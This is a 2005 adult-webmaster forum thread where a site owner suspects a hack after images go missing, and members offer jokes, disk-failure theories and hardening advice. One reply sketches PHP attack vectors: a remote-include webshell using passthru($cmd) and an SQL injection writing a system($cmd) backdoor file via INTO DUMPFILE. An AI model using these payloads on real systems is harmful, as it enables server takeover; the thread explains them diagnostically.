We got hacked. - GoFuckYourself.com

Paul Markham · 08-02-2005, 01:34 AM

Well we think it's the only way the problem on the site could of happened.

A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images.

So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing.

Was in the office until 1.00 last night working at it.

Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours.

CaptainHowdy · 08-02-2005, 01:37 AM

Fuckersssss!! i hope things get back to normal asap !!

mrthumbs · 08-02-2005, 01:37 AM

yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

mrthumbs · 08-02-2005, 01:38 AM

oi bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.

mrthumbs · 08-02-2005, 01:40 AM

they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention.

You should write a book about the vicious attack.

mrthumbs · 08-02-2005, 01:42 AM

Maybe they also got acces to your GFY account.

WARNING TO ALL READERS

Dont give out passwords in this thread if Charly asks for it.. it could be the hacker
social engineering.

Paul Markham · 08-02-2005, 01:44 AM

Quote:

Originally Posted by mrthumbs

yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.

mrthumbs · 08-02-2005, 01:45 AM

Quote:

Originally Posted by charly

So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.

Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..

http://www.paulmarkham.com/all-adult-content.php

Repetitive Monkey · 08-02-2005, 01:45 AM

You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.

Paul Markham · 08-02-2005, 02:06 AM

Quote:

Originally Posted by Repetitive Monkey

You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.

The database does not have "You know what" as a password. Would not use the one on the boards for the database.

And all the updated and changed.

Yes the server is dedicated and all the image content is on one disc which is again protected, but with FTP access this might have given someone access.

The site is updated as we add new content which is a full time operation. Well nearly.

fris · 08-02-2005, 02:06 AM

first mistake is not to announce that you got hacked.

things you keep hush hush

Paul Markham · 08-02-2005, 02:22 AM

Quote:

Originally Posted by fris

first mistake is not to announce that you got hacked.

things you keep hush hush

OK the sites are down for routine maintainence.

V_RocKs · 08-02-2005, 02:45 AM

Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,

Code:

include($p);

Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In there file they included was:

Code:

if ($cmd != '') { passthru($cmd); }

Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Code:

http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'--

Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.

darksoul · 08-02-2005, 02:57 AM

are you sure your hdd is fine ?
a corrupted harddisk would cause this.

Machete_ · 08-02-2005, 03:04 AM

look at the log files on the server, search for the filename missing, and se who last used or moved it

More Booze · 08-02-2005, 03:09 AM

Quote:

Originally Posted by mrthumbs

Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..

http://www.paulmarkham.com/all-adult-content.php

Whats up with all the sarcasm? It could be some script or something the "hacker" left on the server.. :P

broke · 08-02-2005, 03:12 AM

Quote:

Originally Posted by ebus_dk

look at the log files on the server, search for the filename missing, and se who last used or moved it

HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

Machete_ · 08-02-2005, 03:15 AM

Quote:

Originally Posted by broke

HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

I faild to se the humor in that

More Booze · 08-02-2005, 03:22 AM

Quote:

Originally Posted by broke

HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

Ummmmm. His serveradmin might do it for him.

beemk · 08-02-2005, 03:24 AM

Quote:

Originally Posted by mrthumbs

yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

broke · 08-02-2005, 03:26 AM

Quote:

Originally Posted by ebus_dk

I faild to se the humor in that

Is your E key stuck or just plain broken?

fris · 08-02-2005, 03:26 AM

insecure php code rocks.

Paul Markham · 08-02-2005, 03:30 AM

Quote:

Originally Posted by darksoul

are you sure your hdd is fine ?
a corrupted harddisk would cause this.

I'm assuming ISPRIME checked that when we asked them about the problem, but will get onto them and make sure, thanks for the suggestion.

V_RocKs thanks for the programming, all double Dutch to me but I have a guy here who knows about these things.

Quote:

look at the log files on the server, search for the filename missing, and se who last used or moved it

We did that and it was no help.

Trafficbrokercom · 08-02-2005, 04:02 AM

first thing to do is to check /tmp for hidden shellkits ..

so you are uploading the content onto the compromised server again?

don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future?

make sure to set allow_url_fopen = Off in your php.ini

DutchTeenCash · 08-02-2005, 04:06 AM

So whats up with daily backups?

riddler · 08-02-2005, 04:11 AM

sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..

Machete_ · 08-02-2005, 04:15 AM

Quote:

Originally Posted by riddler

sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..

yep. or a failing raidcontroller
Try to run a RAID consistency test

Roald · 08-02-2005, 04:21 AM

Doesn't sound like a hacker to me but more like a failure in your system.

Btw make sure to make backups daily from now on ;)))

broke · 08-02-2005, 04:26 AM

Quote:

Originally Posted by ebus_dk

yep. or a failing raidcontroller
Try to run a RAID consistency test

Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

Violetta · 08-02-2005, 04:46 AM

Quote:

Originally Posted by darksoul

are you sure your hdd is fine ?
a corrupted harddisk would cause this.

It could. What OS do you run?

mikeyddddd · 08-02-2005, 04:49 AM

Have you let Lee help you with any problems recently?

Rui · 08-02-2005, 05:17 AM

bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)

pussyluver · 08-02-2005, 05:30 AM

nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more

Machete_ · 08-02-2005, 05:48 AM

Quote:

Originally Posted by broke

Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

The old Compaq smartarrayII verion 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month

DutchTeenCash · 08-02-2005, 05:52 AM

Quote:

Originally Posted by ebus_dk

The old Compaq smartarrayII verion 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month

we had them too in the company where I used to work BIG issues, our own are dells now fine and with daily backups you cant go wrong

08-02-2005, 01:34 AM	#1
Paul Markham Too old to care Industry Role: Join Date: Jun 2001 Location: On the sofa, watching TV or doing my jigsaws. Posts: 52,943	We got hacked. Well we think it's the only way the problem on the site could of happened. A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images. So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing. Was in the office until 1.00 last night working at it. Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours. __________________ Blowout deal. 880 videos, 2,400 image sets, plus many RAW videos. $500. PM me for a deal. Skype Paulmarkham70

08-02-2005, 01:37 AM	#2
CaptainHowdy Too lazy to set a custom title Industry Role: Join Date: Dec 2004 Location: Happy in the dark. Posts: 93,652	Fuckersssss!! i hope things get back to normal asap !! __________________ Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted Windows VPS now available Great for TSS, Nifty Stats, remote work, virtual assistants, etc.

08-02-2005, 02:45 AM	#13
V_RocKs Damn Right I Kiss Ass! Industry Role: Join Date: Dec 2003 Location: Cowtown, USA Posts: 32,421	Put it back up and I'll tell ya how they did it... Since you use PHP we will start with some basics... Either 1, you use templates and they were able to use one of their own: http://www.paulmarkham.com/all-adult....php?p=contact Which in code is, Code: include($p); Which means they: http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here In there file they included was: Code: if ($cmd != '') { passthru($cmd); } Or you are not removing crap that can be sent to the DB so: http://www.paulmarkham.com/all-adult....php?girl=sara Becomes: Code: http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'-- Of course that would be really simplistic since it would assume that your coder is a complete asshat. Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.

08-02-2005, 02:57 AM	#14
darksoul Confirmed User Join Date: Apr 2002 Location: /root/ Posts: 4,997	are you sure your hdd is fine ? a corrupted harddisk would cause this. __________________ 1337 5y54\|)m1n: 157717888 BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN Cambooth

08-02-2005, 04:06 AM	#25
DutchTeenCash I like Dutch Girls Join Date: Feb 2003 Location: dutchteencash.com Posts: 21,684	So whats up with daily backups? __________________ ICQ 16 91 547 - SKYPE dutchteencash bob AT dutchteencash DOT com ... did you see our newest Sweet Natural Girl Priscilla (18)?

08-02-2005, 01:37 AM	#3
mrthumbs salad tossing sig guy Join Date: Apr 2002 Location: mrthumbs*gmail.com Posts: 11,702	yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

08-02-2005, 01:38 AM	#4
mrthumbs salad tossing sig guy Join Date: Apr 2002 Location: mrthumbs*gmail.com Posts: 11,702	oi bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.

08-02-2005, 01:40 AM	#5
mrthumbs salad tossing sig guy Join Date: Apr 2002 Location: mrthumbs*gmail.com Posts: 11,702	they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention. You should write a book about the vicious attack.

08-02-2005, 01:42 AM	#6
mrthumbs salad tossing sig guy Join Date: Apr 2002 Location: mrthumbs*gmail.com Posts: 11,702	Maybe they also got acces to your GFY account. WARNING TO ALL READERS Dont give out passwords in this thread if Charly asks for it.. it could be the hacker social engineering.

08-02-2005, 01:45 AM	#9
Repetitive Monkey Confirmed User Join Date: Feb 2004 Posts: 3,505	You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.

08-02-2005, 02:06 AM	#11
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,372	first mistake is not to announce that you got hacked. things you keep hush hush

08-02-2005, 03:04 AM	#15
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	look at the log files on the server, search for the filename missing, and se who last used or moved it

08-02-2005, 03:26 AM	#22
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,372	insecure php code rocks.

08-02-2005, 04:02 AM	#24
Trafficbrokercom Confirmed User Join Date: Dec 2002 Posts: 542	first thing to do is to check /tmp for hidden shellkits .. so you are uploading the content onto the compromised server again? don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future? make sure to set allow_url_fopen = Off in your php.ini

08-02-2005, 04:11 AM	#26
riddler Confirmed User Join Date: Oct 2004 Location: up in gang bang heaven Posts: 3,726	sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..

08-02-2005, 04:21 AM	#28
Roald SecretFriends.com Industry Role: Join Date: May 2001 Location: IMC Headquarters Posts: 27,889	Doesn't sound like a hacker to me but more like a failure in your system. Btw make sure to make backups daily from now on ;))) __________________ WE ARE BUYING PAY SITES! CONTACT ME ClubSweethearts \| ManUpFilms \| SinfulXXX \| HOT * AdultPrime * HOT Paying webmasters since 1996! Contact: r.riepen @ sansylgroup.com \| telegram: roaldr

08-02-2005, 04:49 AM	#31
mikeyddddd Viva la vulva! Join Date: Mar 2003 Location: you can't please everyone, so you got to please yourself Posts: 16,557	Have you let Lee help you with any problems recently? __________________ AdultStarProfits AmbyaCash AnilosCash AzianiGold ColdHardCash FlashTheMoney IdolBucks MediumPimpin NSCash Nubiles PussyCash ScoreCash Sextronix SpunkyCash TubeTitans Twistys

08-02-2005, 05:17 AM	#32
Rui web Join Date: Dec 2001 Location: On icq: 85-483-060 Posts: 9,533	bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)

08-02-2005, 05:30 AM	#33
pussyluver Clueless OleMan Join Date: Mar 2003 Location: ICQ - 169903487 Posts: 11,009	nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more